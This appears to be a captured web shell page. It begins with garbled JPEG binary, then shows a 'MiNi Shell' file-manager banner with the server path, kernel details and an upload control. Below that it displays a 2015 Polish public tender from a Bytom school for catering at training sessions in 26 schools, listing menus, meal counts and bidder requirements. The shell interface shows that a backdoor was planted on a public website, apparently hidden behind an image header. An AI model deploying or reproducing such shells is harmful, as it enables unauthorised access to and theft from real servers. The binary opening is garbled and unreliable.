JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150422/91724-N-2015.html

<p class="kh_header"><b>Bytom: Sukcesywne świadczenie usług cateringowych dla uczestników projektu w 26 placówkach edukacyjnych w Bytomiu w ramach projektu Klucze do sukcesu - nowoczesny system wspomagania szkół i przedszkoli oraz doskonalenia nauczycieli w Bytomiu</b><br>
<b>Numer ogłoszenia: 91724 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Nr 9 , ul. Świętochłowicka 12, 41-909 Bytom, woj. śląskie, tel. 32 787 10 19, 787 00 86, faks 32 787 10 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gimnazjum9bytom.szkolnastrona.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: miejska jednostka organizacyjna - szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne świadczenie usług cateringowych dla uczestników projektu w 26 placówkach edukacyjnych w Bytomiu w ramach projektu Klucze do sukcesu - nowoczesny system wspomagania szkół i przedszkoli oraz doskonalenia nauczycieli w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest usługa sukcesywnego świadczenia usług cateringowych dla uczestników projektu Klucze do sukcesu - nowoczesny system wspomagania szkół i przedszkoli oraz doskonalenia nauczycieli w Bytomiu w 26 placówkach oraz w ramach pracy 7 sieci samokształcenia polegająca na przygotowaniu zestawów cateringowych wg poniższego opisu menu  i harmonogramu świadczenia usług w poszczególnych placówkach w terminie od dnia zawarcia umowy do 30 czerwca 2015r.  Przez świadczenie usług cateringowych Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków, odbiór naczyń. Harmonogram dostarczania usług cateringowych z ciepłym posiłkiem: Przedszkole nr 5: liczba posiłków/szkolenie do 30 czerwca 2015 - 15, liczba szkoleń do 30 czerwca 2015: 3 łączna liczba posiłków  do 30 czerwca 2015: 45; Przedszkole nr 14: liczba posiłków/szkolenie do 30 czerwca 2015: 10, liczba szkoleń do 30 czerwca 2015 -  3, łączna liczba posiłków  do 30 czerwca 2015 - 30; Przedszkole nr 21: liczba posiłków/szkolenie do 30 czerwca - 10, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 30; Przedszkole nr 32: liczba posiłków/szkolenie do 30 czerwca 2015 - 12, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 36; Przedszkole nr 63: liczba posiłków/szkolenie do 30 czerwca 2015 - 15, liczba szkoleń do 30 czerwca 2015  - 3, łączna liczba posiłków  do 30 czerwca 2015 - 45; Szkoła Podstawowa nr 9: liczba posiłków/szkolenie do 30 czerwca 2015 - 33, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 96; Szkoła Podstawowa nr  23: liczba posiłków/szkolenie do 30 czerwca 2015 - 32, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca 2015 - 64; Szkoła Podstawowa nr 32; liczba posiłków/szkolenie do 30 czerwca 2015 - 29, liczba szkoleń do 30 czerwca 2015 - 3; łączna liczba posiłków  do 30 czerwca 2015 - 87; Szkoła Podstawowa nr 33: liczba posiłków/szkolenie do 30 czerwca 2015 - 44, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 132; Szkoła Podstawowa nr 36; liczba posiłków/szkolenie do 30 czerwca 2015 - 54, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 162; Szkoła Podstawowa nr 37; liczba posiłków/szkolenie do 30 czerwca 2015 - 26, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca 2015 - 52; Szkoła Podstawowa nr 38; liczba posiłków/szkolenie do 30 czerwca 2015 - 16, liczba szkoleń do 30 czerwca 2015- 3, łączna liczba posiłków  do 30 czerwca 2015 - 48; Szkoła Podstawowa nr 44; liczba posiłków/szkolenie do 30 czerwca 2015 - 27, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 81; Szkoła Podstawowa nr 45: liczba posiłków/szkolenie do 30 czerwca 2015 - 60, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 180; Szkoła Podstawowa nr 46: liczba posiłków/szkolenie do 30 czerwca 2015 - 29, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 87; Szkoła Podstawowa nr 51  z Oddziałami Integracyjnymi liczba posiłków/szkolenie do 30 czerwca 2015 - 71, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 213; Gimnazjum nr 14: liczba posiłków/szkolenie do 30 czerwca 2015: 25, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 -75; Szkoła Podstawowa nr 43: liczba posiłków/szkolenie do 30 czerwca 2015 - 22, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca 2015 - 66; Gimnazjum nr 7: liczba posiłków/szkolenie do 30 czerwca  44, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca 2015 - 88; Gimnazjum nr 2: liczba posiłków/szkolenie do 30 czerwca 2015 - 37, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca - 74; Gimnazjum nr 8: liczba posiłków/szkolenie do 30 czerwca 2015 - 28, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 84; Gimnazjum nr 4: liczba posiłków/szkolenie do 30 czerwca 2015 - 15, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 45; Gimnazjum nr 9: liczba posiłków/szkolenie do 30 czerwca 2015 - 22, liczba szkoleń do 30 czerwca 2015 - 2; łączna liczba posiłków  do 30 czerwca 2015 - 44; Gimnazjum nr 15: liczba posiłków/szkolenie do 30 czerwca 2015 - 16, liczba szkoleń do 30 czerwca 2015 -2, łączna liczba posiłków  do 30 czerwca 2015 -32; II Liceum Ogólnokształcące: liczba posiłków/szkolenie do 30 czerwca 2015 - 30, liczba szkoleń do 30 czerwca 2015 - 2, łączna liczba posiłków  do 30 czerwca 2015 -60; VIII Liceum Ogólnokształcące: liczba posiłków/szkolenie do 30 czerwca 2015  - 36, liczba szkoleń do 30 czerwca 2015 - 3, łączna liczba posiłków  do 30 czerwca 2015 - 108. 
Skład zestawów cateringowych dla danej placówce określa koordynator projektu lub SORE w danej placówce na dzień przed szkoleniem. Ostateczną liczbę posiłków podaje SORE w dniu szkolenia na 3 godziny przed szkoleniem. 
Skład jednego zestawu cateringowego z ciepłym posiłkiem opisano poniżej:
Zestaw nr 1 (opis zestawu dla jednej osoby)
Zupa pomidorowa z makaronem (min. 0,4 l/osobę)
Sałatka Cezara (300 g)/osobę: mix min. 3 gatunków sałat z grillowanym kurczakiem (min. 150 g kurczaka), sos czosnkowy na bazie jogurtu naturalnego, oliwki czarne i zielone (min. 6 sztuk), pomidorki koktajlowe min. 6 szt. 
Pierogi ruskie 8 sztuk z cebulką  (min. 250 g)
 Ciasto z blachy 1 porcja na osobę - 200 gramów: Szarlotka na kruchym cieście z posypką maślaną
Banan min. 150 g
Woda mineralna gazowana i niegazowana  - poj. 1 l (w równych proporcjach na osobę, 0,5 l niegazowanej i 0,5 l gazowana) 
Kawa rozpuszczalna i parzona (wysokogatunkowa  kawa w równych proporcjach na osobę,  łącznie 0,5 l/ osobę)
Cukier 30g, 
Mleko zagęszczone  2 szt. (100 ml)
Herbata czarna, malinowa i zielona (wysokogatunkowa herbata w saszetkach z suszu pełnych liści, niedopuszczalne są: mielony susz, lub liście nie w saszetkach)
Cytryna 15g
lub
Zestaw nr 2 (opis zestawu dla jednej osoby)
Rolada wołowa (min.180 g, z czego min. 150 g mięsa) z sosem, kluski śląskie 6 sztuk (130 g), świeża czerwona kapusta (150 g) z jabłkiem, buraczki zasmażane (120 g), rosół z kury z makaronem i warzywami (min. 0,4 l/osobę)
Ciasto z blachy 1 porcja na osobę  200 gramów: Sernik wiedeński 
Jabłko min. 100 g
Woda mineralna gazowana i niegazowana  - poj. 1 l (w równych proporcjach na osobę, 0,5 l niegazowanej i 0,5 l gazowana) 
Kawa rozpuszczalna i parzona (wysokogatunkowa  kawa w równych proporcjach na osobę,  łącznie 0,5 l/ osobę)
Cukier 30g, 
Mleko zagęszczone  2 szt. (100 ml)
Herbata czarna, malinowa i zielona (wysokogatunkowa herbata w saszetkach z suszu pełnych liści, niedopuszczalne są: mielony susz, lub liście nie w saszetkach)
Cytryna 15g
lub
Zestaw nr 3 (opis zestawu dla jednej osoby) 
Filet z kurczaka w panierce z migdałów (min. 150 g mięsa), gotowane  ziemniaki (120 g), surówka z białej surowej kapusty z marchewką koperkiem i jabłkiem i sosem czosnkowym  (min. 150 g), oraz sałatka z kapusty pekińskiej z papryką, ogórkiem, cebulą (min. 150 g), 
zupa ogórkowa (min. 0,4 l/osobę)
Ciasto z blachy 1 porcja na osobę - 200 gramów - drożdżowe z kruszonką
Gruszka (min 130 g)
Woda mineralna gazowana i niegazowana  - poj. 1 l (w równych proporcjach na osobę, 0,5 l niegazowanej i 0,5 l gazowana) 
Kawa rozpuszczalna i parzona (wysokogatunkowa  kawa w równych proporcjach na osobę,  łącznie 0,5 l/ osobę)
Cukier 30g, 
Mleko zagęszczone  2 szt. (100 ml)
Herbata czarna, malinowa i zielona (wysokogatunkowa herbata w saszetkach z suszu pełnych liści, niedopuszczalne są: mielony susz, lub liście nie w saszetkach)
Cytryna 15g
lub
Zestaw nr 4 (opis zestawu dla jednej osoby) 
Placek po węgiersku (min. 300 g porcja), w tym min. 150 g mięsa wołowego lub wieprzowego, sałatka grecka 250g (mix 3 sałat: rzymska, rukola, masłowa), czarne oliwki i zielone - mix, min. 50 g, ser typu feta min. 80 g., pomidorki koktajlowe min.50g,)  
Ciasto z blachy 1 porcja na osobę - 200 gramów: Makowiec na kruchym spodzie 
2 mandarynki/ 1os.
Woda mineralna gazowana i niegazowana  - poj. 1 l (w równych proporcjach na osobę, 0,5 l niegazowanej i 0,5 l gazowana) 
Kawa rozpuszczalna i parzona (wysokogatunkowa  kawa w równych proporcjach na osobę,  łącznie 0,5 l/ osobę)
Cukier 30g, 
Mleko zagęszczone  2 szt. (100 ml)
Herbata czarna, malinowa i zielona (wysokogatunkowa herbata w saszetkach z suszu pełnych liści, niedopuszczalne są: mielony susz, lub liście nie w saszetkach)
Cytryna 15g
lub
Zestaw nr 5 (opis zestawu dla jednej osoby)
Filet łososia norweskiego  (min. 220 g mięsa), gotowane  ziemniaki (120 g), surówka z białej surowej kapusty z marchewką koperkiem i jabłkiem i sosem czosnkowym  (min. 150 g), oraz szpinak na gęsto z czosnkiem  (min. 100 g), 
zupa borowikowa  (min. 0,4 l/osobę)
Ciasto z blachy 1 porcja na osobę - 200 gramów - kruche z wiśniami 
Jabłko (min 130 g)
Woda mineralna gazowana i niegazowana  - poj. 1 l (w równych proporcjach na osobę, 0,5 l niegazowanej i 0,5 l gazowana) 
Kawa rozpuszczalna i parzona (wysokogatunkowa  kawa w równych proporcjach na osobę,  łącznie 0,5 l/ osobę)
Cukier 30g, 
Mleko zagęszczone  2 szt. (100 ml)
Herbata czarna, malinowa i zielona (wysokogatunkowa herbata w saszetkach z suszu pełnych liści, niedopuszczalne są: mielony susz, lub liście nie w saszetkach)
Cytryna 15g.
Ilość  zestawów cateringowych oraz ich skład dla danej sieci współpracy i samokształcenia określa koordynator projektu lub koordynator sieci  na 3 godziny  przed planowanym szkoleniem.Skład jednego zestawu cateringowego z zimnym  posiłkiem kanapkowym obejmuje:
1. Kanapki bankietowe min. 3 sztuki (min. 150 g) na uczestnika zawierające: sałatę zieloną, polędwicę wieprzową, pastę twarogową i pastę z łososia i tuńczyka, ser żółty, jajko,  pomidor, ogórek zielony, masło. Kanapki podane będą na pieczywie jasnym i ciemnym - pełnoziarnistym. Wykonawca dostarczy kanapki w dwóch lub trzech kompozycjach, na bazie składników wymienionych wyżej, w ilościach po 1/2 ogólnej ilości kanapek dla dwóch kompozycji lub po 1/3 ogólnej liczby kanapek dla trzech kompozycji. Kanapki przygotowane mają być wyłącznie ze świeżych produktów dostępnych na rynku: powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny wygląd.
2a. sałatkę grecką (min. 250 g) na uczestnika zawierające: mix 3 rodzajów sałat, min. 4  pomidorki koktajlowe, min. 6 oliwek (mix 3 zielone i 3 czarne) i dwa inne warzywa np. ogórek i kukurydza po 15 g każde, ser typu feta min. 120 g/osobę, sos winegret. 
lub 2b. sałatkę Cezara  (min. 250 g) na uczestnika zawierające: mix 3 rodzajów sałat, min. 4  pomidorki koktajlowe, min. 6 oliwek (mix 3 zielone i 3 czarne) i dwa inne warzywa np. ogórek i kukurydza, grillowany kurczak min 120 g/osobę, sos winegret. 
3. Zestaw kawowy:  kawa (kawa rozpuszczalna i sypana parzona, parzona w metalowych termosach a podawana w kubkach jednorazowych kubkach przystosowanych do zalewania wrzątkiem, o poj. 0,3l - min. 200 ml naparu na jednego uczestnika szkolenia), ekspresowa herbata owocowa i czarna w jednorazowych saszetkach pakowanych oddzielnie zawierająca całe liście herbaty lub suszu owocowego (2 sztuki dla uczestnika), woda 0,5 l niegazowana, śmietanka do kawy, jednorazowa płynna w jednorazowym pojemniku, nie mniej niż 10g lub sypana jednorazowa tzw. zabielacz do kawy, cytryna, cukier do herbaty i kawy, w saszetkach jednorazowych nie mniej niż 4 g; susz konferencyjny min. 3 kruche ciastka/os., sernik lub makowiec lub ciasto z owocami min. 150 g/osobę. Owoce: jabłko (min. 150 g lub banan min 150 g lub gruszka min. 150 g). 
Harmonogram dostarczania usług cateringowych z posiłkiem kanapkowym: sieć Edukacja czytelnicza z elementami kultury, liczba szkoleń do 30 czerwca 2015 r. - 4, liczba zestawów - 80;  Pozapedagogiczne obowiązki dyrektora, sieć: Stres i wypalenie zawodowe, liczba szkoleń do 30 czerwca 2015 r. - 3, liczba zestawów - 95; sieć: Jak rozwijać twórcze myślenie uczniów, liczba szkoleń do 30 czerwca 2015 r. - 3, liczba zestawów - 60; sieć TIK - liczba szkoleń do 30 czerwca 2015 r. - 3, liczba zestawów -60. 
Wykonawca zobowiązany będzie dostarczyć: a) naczynia jednorazowe (talerze deserowe styropianowe) do konsumpcji ciastek lub/i kanapek w ilości uczestników przewidzianych na każde szkolenie b)  łyżeczki jednorazowe w ilości w ilości uczestników przewidzianych na każde szkolenie, kubki do zimnych napojów w ilości w ilości uczestników przewidzianych na każde szkolenie, 4 worki na zużyte naczynia o pojemności 60 litrów na każde szkolenie. 
W zleceniu Zamawiający określi na dzień  przed spotkaniem termin, miejsce, zakres usługi restauracyjnej tj. zestaw zgodnie z opisem w SIWZ. Zamawiający zastrzega sobie prawo do zmiany terminu dostarczenia usługi, jak i ilości posiłków max do 3 godzin przed szkoleniem z przyczyn losowych, niezależnych od Zamawiającego. Zamawiający nie wyraża zgody na dokonywanie zmian w posiłkach wchodzących w skład danego zestawu usługi.
Ilość i wielkość zamawianych usług wskazana w Załączniku nr 1 do SIWZ stanowi maksymalny ich zakres i wielkość zamówienia. Zamawiający zastrzega sobie możliwość zamówienia mniejszej ilości usług, niż maksymalna wskazana w SIWZ, a w takiej sytuacji Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu, w szczególności o zapłatę za ilość stanowiącą różnicę między maksymalną ilością usług wskazanych w Załączniku nr 1 do SIWZ, a ilością rzeczywiście zrealizowaną na podstawie poszczególnego zlecenia Zamawiającego. Rozliczenie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu umowy, po dokonaniu protokolarnego odbioru przedmiotu umowy. Ceny zaoferowane przez Wykonawcę w ofercie przetargowej nie ulegną podwyższeniu przez cały okres obowiązywania umowy. 
W ramach zamówienia Wykonawca jest zobowiązany do:
- przygotowania, dowozu i podawania posiłków w dni wskazane przez Zamawiającego do miejsca i sali, w której będzie odbywało się szkolenie,
- świadczenia usług cateringowych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
- przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia tj. Dz.U.2010.136.914 ze zm.),
- przygotowania  posiłków w sposób uzgodniony z Zamawiającym,
- świadczenia usług cateringowych na zastawie ceramicznej lub porcelanowej, ewentualnie w jednorazowych opakowaniach przystosowanych do żywności,
 - dostarczania do placówek ciepłych posiłków o temp. nie mniejszej niż 65 stopni C, 
- estetycznego i higienicznego podawania posiłków,
- dostarczania i wydawania posiłków w  wyznaczonej godzinie i nie wcześniej niż 10 min przed ustalonym terminem na miejsce wskazane przez Zamawiającego 
- zebrania naczyń oraz resztek pokonsumpcyjnych bezpośrednio po zakończeniu szkolenia lub w dniu następnym. Warunki realizacji niniejszego zamówienia określają istotne postanowienia umowne wraz ze szczegółowym opisem przedmiotu zamówienia, stanowiące załączniki do specyfikacji (załącznik nr 8)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż posiada aktualną decyzję właściwego organu inspekcji sanitarnej uprawniającej Wykonawcę do prowadzenia działalności gastronomicznej, w tym cateringowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Wykonawca zobowiązany jest wykazać, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej  dwie usługi cateringowe na kwotę nie mniejszą niż 25000 (brutto) każda oraz przedłożyć dowody czy  zostały wykonane należycie.
W przypadku usług wykonywanych, Zamawiający uzna spełnienie ww. warunku, jeżeli do dnia wyznaczonego na składanie ofert w ww. okresie nastąpiła realizacja co najmniej dwóch usług cateringowych na kwotę nie mniejszą niż 25 000zł (brutto) każda oraz Wykonawca przedłoży dowody czy  zostały wykonane należycie.
b) Wykonawca posiada doświadczenie w prowadzeniu usług cateringowych dla grup co najmniej 50 osób dorosłych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż dysponuje lub będzie dysponował min. 2 środkami transportu posiadającymi aktualne zaświadczenie lub decyzję zatwierdzającą właściwej Stacji Sanitarno - Epidemiologicznej dopuszczające je do przewozu żywności (zgodnie z Ustawą  z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia oraz Zarządzeniem nr 852 UE Zbiór wytycznych w zakresie wdrażania procedur opartych na zasadach HACCP  oraz  ułatwień we wdrażaniu zasad HACCP w niektórych przedsiębiorstwach sektora spożywczego).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wraz z podaniem ich wartości, przedmiotu, dat wykonania  i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 5 do siwz),
Pod pojęciem głównych usług zamawiający rozumie usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia opisanego powyżej.
UWAGA:
